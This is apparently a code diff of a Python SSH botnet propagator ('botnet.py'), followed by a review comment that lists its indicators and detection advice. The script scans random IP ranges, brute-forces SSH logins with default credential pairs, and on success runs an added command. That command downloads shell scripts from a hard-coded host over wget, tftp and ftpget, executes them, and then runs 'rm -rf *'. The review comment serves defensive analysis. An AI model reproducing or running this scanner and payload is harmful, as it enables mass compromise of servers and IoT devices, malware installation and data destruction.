1 | #!/usr/bin/env python | |
2 | # -*- coding: utf-8 -*- | |
3 | ||
4 | # ulimit -n 999999; ulimit -u 999999 | |
5 | # sysctl -w fs.file-max=100000 | |
6 | # python botnet.py 376 LUCKY x 0 (LUCKY RANGES) | |
7 | # python botnet.py 376 B 113.53 1 (SCANNER EXAMPLE) | |
8 | # python botnet.py 376 RAND x all (IP RANDOMIZATION) | |
9 | # 113.53, 125.26, 125.27, 125, | |
10 | ||
11 | import threading, paramiko, random, socket, time, sys | |
12 | ||
13 | paramiko.util.log_to_file("/dev/null") # silents spam of paramiko | |
14 | ||
15 | files = [ # Binary names | |
16 | "cvb", | |
17 | "cvv", | |
18 | "dsf", | |
19 | "fdgxc", | |
20 | "sdf", | |
21 | "sdfv", | |
22 | "xnvx", | |
23 | ||
24 | ] | |
25 | ||
26 | website = "185.112.249.142" # Binary Host IP | |
27 | ||
28 | reservedips = [ | |
29 | 'http://127.', | |
30 | 'http://0', | |
31 | 'http://10.', | |
32 | 'http://100.64', | |
33 | 'http://100.65', | |
34 | 'http://100.66', | |
35 | 'http://100.67', | |
36 | 'http://100.68', | |
37 | 'http://100.69', | |
38 | 'http://100.70', | |
39 | 'http://100.71', | |
40 | 'http://100.72', | |
41 | 'http://100.73', | |
42 | 'http://100.74', | |
43 | 'http://100.75', | |
44 | 'http://100.76', | |
45 | 'http://100.77', | |
46 | 'http://100.78', | |
47 | 'http://100.79', | |
48 | 'http://100.80', | |
49 | 'http://100.81', | |
50 | 'http://100.82', | |
51 | 'http://100.83', | |
52 | 'http://100.84', | |
53 | 'http://100.85', | |
54 | 'http://100.86', | |
55 | 'http://100.87', | |
56 | 'http://100.88', | |
57 | 'http://100.89', | |
58 | 'http://100.90', | |
59 | 'http://100.91', | |
60 | 'http://100.92', | |
61 | 'http://100.93', | |
62 | 'http://100.94', | |
63 | 'http://100.95', | |
64 | 'http://100.96', | |
65 | 'http://100.97', | |
66 | 'http://100.98', | |
67 | 'http://100.99', | |
68 | 'http://100.100', | |
69 | 'http://100.101', | |
70 | 'http://100.102', | |
71 | 'http://100.103', | |
72 | 'http://100.104', | |
73 | 'http://100.105', | |
74 | 'http://100.106', | |
75 | 'http://100.107', | |
76 | 'http://100.108', | |
77 | 'http://100.109', | |
78 | 'http://100.110', | |
79 | 'http://100.111', | |
80 | 'http://100.112', | |
81 | 'http://100.113', | |
82 | 'http://100.114', | |
83 | 'http://100.115', | |
84 | 'http://100.116', | |
85 | 'http://100.117', | |
86 | 'http://100.118', | |
87 | 'http://100.119', | |
88 | 'http://100.120', | |
89 | 'http://100.121', | |
90 | 'http://100.122', | |
91 | 'http://100.123', | |
92 | 'http://100.124', | |
93 | 'http://100.125', | |
94 | 'http://100.126', | |
95 | 'http://100.127', | |
96 | 'http://169.254', | |
97 | 'http://172.16.', | |
98 | 'http://172.17.', | |
99 | 'http://172.18.', | |
100 | 'http://172.19.', | |
101 | 'http://172.20.', | |
102 | 'http://172.21.', | |
103 | 'http://172.22.', | |
104 | 'http://172.23.', | |
105 | 'http://172.24.', | |
106 | 'http://172.25.', | |
107 | 'http://172.26.', | |
108 | 'http://172.27.', | |
109 | 'http://172.28.', | |
110 | 'http://172.29.', | |
111 | 'http://172.30.', | |
112 | 'http://172.32.', | |
113 | 'http://192.0.0.0', | |
114 | 'http://192.0.0.1', | |
115 | 'http://192.0.0.2', | |
116 | 'http://192.0.0.3', | |
117 | 'http://192.0.0.4', | |
118 | 'http://192.0.0.5', | |
119 | 'http://192.0.0.6', | |
120 | 'http://192.0.0.7', | |
121 | 'http://192.0.2.', | |
122 | 'http://192.88.99.', | |
123 | 'http://192.168.', | |
124 | 'http://198.18.', | |
125 | 'http://198.19.', | |
126 | 'http://198.51.100.', | |
127 | 'http://203.0.113.', | |
128 | 'http://224.', | |
129 | 'http://225' | |
130 | ] | |
131 | ||
132 | ||
133 | passwords = [ # perls/la | |
134 | "root:root", | |
135 | "root:admin", | |
136 | "admin:admin", | |
137 | "ubnt:ubnt" | |
138 | "root:1234", | |
139 | "admin:1234", | |
140 | "guest:guest", | |
141 | "user:user", | |
142 | "test:test", | |
143 | "pi:raspberry", | |
144 | "vagrant:vagrant" | |
145 | ] | |
146 | ||
147 | ascii = '\x1b[1;35m'########################################################################### | |
148 | ascii +=' \r\n'# | |
149 | ascii +=' ▒███████▒ ▒█████ ███▄ █ ▓█████ ██████ ▓█████ ▄████▄ 0 \r\n'# | |
150 | ascii +=' ▒ ▒ ▒ ▄▀░▒██▒ ██▒ ██ ▀█ █ ▓█ ▀ ▒██ ▒ ▓█ ▀ ▒██▀ ▀█ \r\n'# | |
151 | ascii +=' ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ▀█ ██▒▒███ ░ ▓██▄ ▒███ ▒▓█ ▄ \r\n'# | |
152 | ascii +=' ▄▀▒ ░▒██ ██░▓██▒ ▐▌██▒▒▓█ ▄ ▒ ██▒▒▓█ ▄ ▒▓▓▄ ▄██▒ \r\n'# | |
153 | ascii +=' ▒███████▒░ ████▓▒░▒██░ ▓██░░▒████▒▒██████▒▒░▒████▒▒ ▓███▀ ░ \r\n'# | |
154 | ascii +=' ░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒░ ▒ ▒ ░░ ▒░ ░▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ░▒ ▒ ░ \r\n'# | |
155 | ascii +=' ░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░ ░░ ░ ▒░ ░ ░ ░░ ░▒ ░ ░ ░ ░ ░ ░ ▒ \r\n'# | |
156 | ascii +=' ░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ \r\n'# | |
157 | ascii +=' ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ \r\n'# | |
158 | ascii +=' ░ ░ \r\n'# | |
159 | ascii +=' ~[ ZoneSec Cyber Rapist.]~ \r\n'# | |
160 | ascii +='\x1b[0m'############################################################################## | |
161 | ||
162 | print ascii | |
163 | print sys.argv[0]+' <Threads(MAX: 376)> <A/B/C/ (IP Class)> <Range> <1(slow but effective)/2(fast but less effective)/perl(scans for perlbots/all(scans for everything!>' | |
164 | ||
165 | if sys.argv[4] == '1': | |
166 | passwords = [ "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] #Slow but effective | |
167 | if sys.argv[4] == '2': | |
168 | passwords = [ "root:root", "admin:admin" ] #Fast but yet less effective | |
169 | if sys.argv[4] == 'perl': | |
170 | passwords = [ "pi:raspberry", "vagrant:vagrant", "ubnt:ubnt" ] #perl scanner | |
171 | if sys.argv[4] == 'all': | |
172 | passwords = [ "pi:raspberry", "vagrant:vagrant", "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] # scans all passwords but very slow | |
173 | ||
174 | ipclassinfo = sys.argv[2] | |
175 | if ipclassinfo == "A": | |
176 | ip1 = sys.argv[3] | |
177 | elif ipclassinfo == "B": | |
178 | ip1 = sys.argv[3].split(".")[0] | |
179 | ip2 = sys.argv[3].split(".")[1] | |
180 | elif ipclassinfo == "C": | |
181 | ips = sys.argv[3].split(".") | |
182 | num=0 | |
183 | for ip in ips: | |
184 | num=num+1 | |
185 | if num == 1: | |
186 | ip1 = ip | |
187 | elif num == 2: | |
188 | ip2 = ip | |
189 | elif num == 3: | |
190 | ip3 = ip | |
191 | class sshscanner(threading.Thread): | |
192 | global passwords | |
193 | global ipclassinfo | |
194 | if ipclassinfo == "A": | |
195 | global ip1 | |
196 | elif ipclassinfo == "B": | |
197 | global ip1 | |
198 | global ip2 | |
199 | elif ipclassinfo == "C": | |
200 | global ip1 | |
201 | global ip2 | |
202 | global ip3 | |
203 | def run(self): | |
204 | while 1: | |
205 | try: | |
206 | while 1: | |
207 | thisipisbad='no' | |
208 | if ipclassinfo == "A": | |
209 | self.host = 'http://'+ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) | |
210 | elif ipclassinfo == "B": | |
211 | self.host = 'http://'+ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) | |
212 | elif ipclassinfo == "C": | |
213 | self.host = 'http://'+ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256)) | |
214 | elif ipclassinfo == "LUCKY": | |
215 | lucky = ["201.13","197.23","187.89","37.236","191.53","161.18","191.53","186.208","1.0","177.137","177.38","101.108","125.27","177.44","179.189","179.97","125.17"] | |
216 | self.host = 'http://'+random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) | |
217 | else: | |
218 | self.host = 'http://'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) | |
219 | for badip in reservedips: | |
220 | if badip in self.host: | |
221 | thisipisbad='yes' | |
222 | if thisipisbad=='no': | |
223 | break | |
224 | self.host=self.host.replace('http://', '') | |
225 | username='root' | |
226 | password="0" | |
227 | port = 22 | |
228 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
229 | s.settimeout(3) | |
230 | s.connect((self.host, port)) | |
231 | s.close() | |
232 | ssh = paramiko.SSHClient() | |
233 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | |
234 | dobreak=False | |
235 | for passwd in passwords: | |
236 | if ":n/a" in passwd: | |
237 | password="" | |
238 | else: | |
239 | password=passwd.split(":")[1] | |
240 | if "n/a:" in passwd: | |
241 | username="" | |
242 | else: | |
243 | username=passwd.split(":")[0] | |
244 | try: | |
245 | ssh.connect(self.host, port = port, username=username, password=password, timeout=3) | |
246 | dobreak=True | |
247 | break | |
248 | except: | |
249 | pass | |
250 | if True == dobreak: | |
251 | break | |
252 | badserver=True | |
253 | stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig") | |
254 | output = stdout.read() | |
255 | if "inet addr" in output: | |
256 | badserver=False | |
257 | websites = [ ] | |
258 | if badserver == False: | |
259 | print 'Adding:'+username+'<'+password+'>'+self.host+'|'+str(port) | |
260 | - | ssh.exec_command("put ur wget here ignore the shit up top.") #la |
260 | + | ssh.exec_command("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://162.213.38.77/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 162.213.38.77 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 162.213.38.77; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 162.213.38.77 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *") #la |
261 | ||
262 | time.sleep(15) | |
263 | ssh.close() | |
264 | except: | |
265 | pass | |
266 | ||
267 | for x in range(0,int(sys.argv[1])): | |
268 | try: | |
269 | t = sshscanner() | |
270 | t.start() | |
271 | except: | |
272 | pass |
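Review bot: The command string added at paste line 260 is the only functional change and it is a remote fetch-and-execute payload, so it is best read as an indicator set: staging host `162.213.38.77` and the scripts `bins.sh`, `tftp1.sh`, `tftp2.sh` and `ftp1.sh`, pulled over HTTP, TFTP and FTP into `/tmp`, `/var/run`, `/mnt`, `/root` or `/`, followed by `rm -rf *` in that directory. On a receiving host this appears as a password-authenticated SSH session for one of the default pairs in `passwords`, an `/sbin/ifconfig` exec, and then the download chain; alerting on sshd password logins that spawn `wget`/`tftp`/`ftpget`, and on outbound TFTP from servers, covers it. Key-only SSH authentication and removing or re-keying the listed default accounts close the entry point. The `website` value `185.112.249.142` near the top is not referenced in the visible code and may be a second, older indicator. The enclosing `run` method begins well above the changed line, which sits deep inside its outer `try`.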